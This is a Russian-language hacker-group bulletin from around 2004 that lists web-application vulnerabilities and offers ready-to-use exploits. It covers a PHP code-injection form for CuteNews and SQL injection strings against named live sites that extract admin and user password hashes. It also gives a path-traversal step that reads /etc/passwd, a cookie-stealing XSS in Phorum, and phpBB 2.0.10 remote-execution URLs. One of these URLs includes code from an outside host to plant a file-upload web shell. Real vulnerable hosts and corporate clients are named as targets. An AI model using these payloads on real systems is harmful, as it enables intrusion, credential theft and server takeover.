Fresh CGI-bugz from Cyber Lords Team

Все нижеперечисленные уязвимости (кроме уязвимости в phpbb) и способы их использования (включая уязвимость в phpbb =)) найдены командой Cyber Lords [cyberlords.net]

CuteNews 1.3 [old versions]

В версии 1.3 и возможно более новых. В последних
версиях устранено.

PHP Code injection

Довольно распространённый скрипт управления новостями с гибкими настройками.При добавлении новых комментариев скрипт записывает в flood.db.php ip пользователя, id новости и время добавления. Но скрипт не проверяет id новости
на опасные символы, что позволяет внедрить произвольный php код и выполнить его
на сервере, напрямую обратившись к скрипту.

<form method=POST name=comment action="http://host.ru/cutenews/show_news.php?subaction=showcomments&id=<?include($_GET[cmd])?>&archive=&cnshow=news"> <input type=hidden name="name" value="xxxxxx"> <input type=hidden name="comments" value="xxxxx xxxx"> <input type=submit name=submit value=' Add My Comment ' accesskey="s"> <input type=hidden name=subaction value=addcomment /> <input type=hidden name=ucat value="" /> <input type=hidden name=show value="" /> </form>

затем => http://host.ru/cutenews/inc/flood.db.php?cmd=ls .

Также во всех версиях присутствует php code injection в файлы шаблонов, но для это требуются права администратора в CuteNews.

Примеры уязвимых хостов: http://www.hometheatercomputer.net/news/ http://www.bluehost.net/cutenews/

Knowledge Base system от rightnow.com [*HOT!*]

[все версии]

SQL injection

Распространённая мощная система помощи пользователям. Примерная стоимость $50000
(пятьдесят тысяч), отсюда и серьёзные клиенты. Скрипт email_adp.php не проверяет данные на пример опасных символов, что позволяет внедрить sql запрос.

http://rightnow.custhelp.com/cgi-bin/rightnow.cfg/php/enduser/email_adp.php?p_fa qid=118000)%20union%20select%20user()/*

Клиенты: Toyota Motor Sales - Lexus Division, iPowerWeb, Inc., Adaptec, AAA Carolinas etc

MercuryBoard

[все версии]

SQL injection

Распространённый форум с большим количеством функций.

Несколько sql injection.

http://forums.mercuryboard.com/index.php?a=pm&s=view&m=1'

http://forums.mercuryboard.com/index.php?a=post&s=reply&t=1'

http://forums.mercuryboard.com/index.php?a=pm&s=view&m=1'

Получаем md5 hash пароля администратора: http://forums.mercuryboard.com/index.php?a=post&s=reply&t=100&f=3&qu=100000%20un ion%20select%20user_password,2%20from%20mb_users%20where%20user_id=2/*

Модифицируем свои cookie. Затем ищем топик с приаттаченными файлами или создаём сами. Смотрим id аттача. Топаем в админ панель, в Execute an SQL query и выполняем запрос: UPDATE mb_attach SET attach_file='../../../../../etc/passwd' WHERE attach_id=ид_аттача И смотрим содержимое /etc/passwd по адресу http://forums.mercuryboard.com/index.php?a=topic&s=attach&id=ид_аттача

Например /etc/passwd с forums.mercuryboard.com: http://forums.mercuryboard.com/index.php?a=topic&s=attach&id=2

SmsMail.Ru

самый крупный ру-сервис по отсылке SMS сообщений

SQL injection

SQL injection в http://smsmail.ru/
Отсутствие проверки входных данных при авторизации. http://smsmail.ru/edit.php
Эксплуатация:
В поле "Логин или телефон" ввести emlc2c' and m.domain='smsmail' and m.user_id = u.user_id and t.tariff=u.tariff union select 1,123,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,123,26,27, password,phone from users limit 1/*

Клиенты: masterhost, Аэропорт "Домодедово"

Phorum

Phorum 5.0.13a Stable. [Последняя версия на 27.11.2004]

Распространённый форум с множеством функций.

XSS

XSS в значении My Profile -> Real Name.
Например John Smith<script>JavaScript.Code.Here</script>.
При просмотре профиля пользователя выполнится произвольный JavaScript код.
Например: John Smith<script>alert(document.cookie)</script> покажет куки пользователя (в том числе и md5 hash пароля).

Zend Encoder

[все версии]

Программа, позволяющая кодировать PHP файлы так, что работоспособность остаётся,
но смотреть их уже нельзя.

Уязвимость:
Несмотря на то, что файл закодирован, из него всё равно можно извлечь названия и значения переменных.
Эксплуатация:
include("/encoded/file.php"); echo "<pre>"; var_dump($GLOBALS);
В результате мы получим все переменные в удобном для просмотра виде.

Использование уязвимости в phpbb 2.0.10 (оффтоп: эта уязвимость найдена НЕ by ccteam.nu [личное мнение Satir])

http://www.host.ru/forum/viewtopic.php?p=25013&highlight=%2527.system($_GET[cmd] ).%2527&cmd=cat config.php
либо
http://www.host.ru/forum/viewtopic.php?p=25013&highlight=%2527.$poster=`cat%09co nfig.php`.%2527
Так можно закачать файл:
http://www.host.ru/forum/viewtopic.php?p=25013&highlight=%2527.include($_GET[upl ]).%2527&upl=http://www.mazafaka.ru/upl.txt? в upl.txt: <? $dir = "rem.php"; if (is_uploaded_file($_FILES["yourfile"]["tmp_name"])) { $res = move_uploaded_file($_FILES["yourfile"]["tmp_name"], $dir); if ($res) echo "Файл успешно закачан в ".$dir; else echo "Ошибка записи файла!"; } else { echo "<form action=\"http://www.host.ru/forum/viewtopic.php?p=25013&highlight=%2527.include( \$_GET[upl]).%2527&upl=http://www.mazafaka.ru/upl.txt?\" method=post enctype=multipart/form-data> <input type=hidden name=act value=upload> Select file: <input type=file name=yourfile> <input type=submit value=\"UPLOAD\"> </form>"; } ?>